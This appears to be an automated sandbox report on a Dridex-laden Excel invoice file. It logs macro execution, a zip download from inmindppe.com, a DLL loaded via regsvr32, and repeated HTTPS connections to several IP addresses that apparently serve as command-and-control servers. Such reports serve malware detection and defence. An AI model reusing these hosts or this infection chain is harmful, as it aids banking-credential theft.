Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\28E159F7.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /eb3kd1le.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: inmindppe.comConnection: Keep-Alive
Source: regsvr32.exe, 00000004.00000002.2382308141.00000000003F1000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com$T equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2382308141.00000000003F1000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: inmindppe.com
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000006.00000002.2230867623.00000000028E3000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: DWWIN.EXE, 00000006.00000003.2228827682.000000000292D000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crtF
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000006.00000002.2230867623.00000000028E3000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000006.00000002.2230867623.00000000028E3000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2229399297.00000000004F8000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DWWIN.EXE, 00000006.00000003.2228898902.00000000004CE000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enRa
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230821082.0000000002898000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000006.00000002.2230867623.00000000028E3000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2382894388.0000000002180000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2234299675.00000000041C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2382287592.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382544671.0000000001D80000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230070826.0000000002360000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2382894388.0000000002180000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2234299675.00000000041C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/D
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2382308141.00000000003F1000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/h
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49351 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49347
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49343
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49221
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
Source: unknownNetwork traffic detected: HTTP traffic on port 49359 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
Source: unknownNetwork traffic detected: HTTP traffic on port 49339 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49339
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49217
Source: unknownNetwork traffic detected: HTTP traffic on port 49327 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49335
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49299
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49331
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49295
Source: unknownNetwork traffic detected: HTTP traffic on port 49319 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 49379 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49291
Source: unknownNetwork traffic detected: HTTP traffic on port 49371 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49209
Source: unknownNetwork traffic detected: HTTP traffic on port 49347 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49327
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49205
Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49399 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49323
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49287
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49391 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49231 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49363 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49315 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49319
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49315
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49279
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49311
Source: unknownNetwork traffic detected: HTTP traffic on port 49295 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49399
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49395
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49271
Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49391
Source: unknownNetwork traffic detected: HTTP traffic on port 49205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49307 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49307
Source: unknownNetwork traffic detected: HTTP traffic on port 49383 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49303
Source: unknownNetwork traffic detected: HTTP traffic on port 49303 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49267
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49387
Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49383
Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49355 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49403 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49275 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49379
Source: unknownNetwork traffic detected: HTTP traffic on port 49323 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49255
Source: unknownNetwork traffic detected: HTTP traffic on port 49287 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49375
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49371
Source: unknownNetwork traffic detected: HTTP traffic on port 49255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49343 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49403
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49367
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49243
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49363
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49395 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49311 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49367 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49359
Source: unknownNetwork traffic detected: HTTP traffic on port 49291 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49355
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49231
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49351
Source: unknownNetwork traffic detected: HTTP traffic on port 49331 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49387 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49299 -> 443
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49177 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49181 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49185 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49189 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49193 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49197 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49201 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49205 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49209 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49217 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49221 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49226 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49231 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49235 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49239 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49243 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49247 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49251 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49255 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49259 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49263 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49267 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49271 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49275 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49279 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49283 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49287 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49291 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49295 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49299 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49303 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49307 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49311 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49315 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49319 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49323 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49327 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49331 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49335 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49339 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49343 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49347 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49355 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49359 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49363 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49367 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49371 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49375 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49379 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49383 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49387 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49391 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49395 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49399 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49403 version: TLS 1.2

E-Banking Fraud:

barindex
Detected Dridex e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00465150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Windows\System32\DWWIN.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCCJump to dropped file

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: INV9698791470-20210111920647.xlsmInitial sample: CALL
Source: INV9698791470-20210111920647.xlsmInitial sample: CALL
Source: INV9698791470-20210111920647.xlsmInitial sample: CALL
Source: INV9698791470-20210111920647.xlsmInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\deibsjhv.dllJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004722A0 NtDelayExecution,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0048BE30 NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001FB770 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001FBA14 NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00465150
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00481020
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047D030
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004788C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00478CC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0046ACD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047A0D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004798DA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047E0A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0048DCA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004850A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00484CA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00485CB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00477564
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00461570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047FDD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004889F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004871F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047D980
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0048D180
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047C590
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0046F9A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00481240
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047A660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00487660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00482E60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00469E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00479E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0046CA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0048FA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00480220
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0048D620
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00483EC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0048FA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00466AD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004796D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047F6E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047B6F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00478EF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004862F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047AE80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00478AB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00481EB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004826B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047BF50
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00475B60
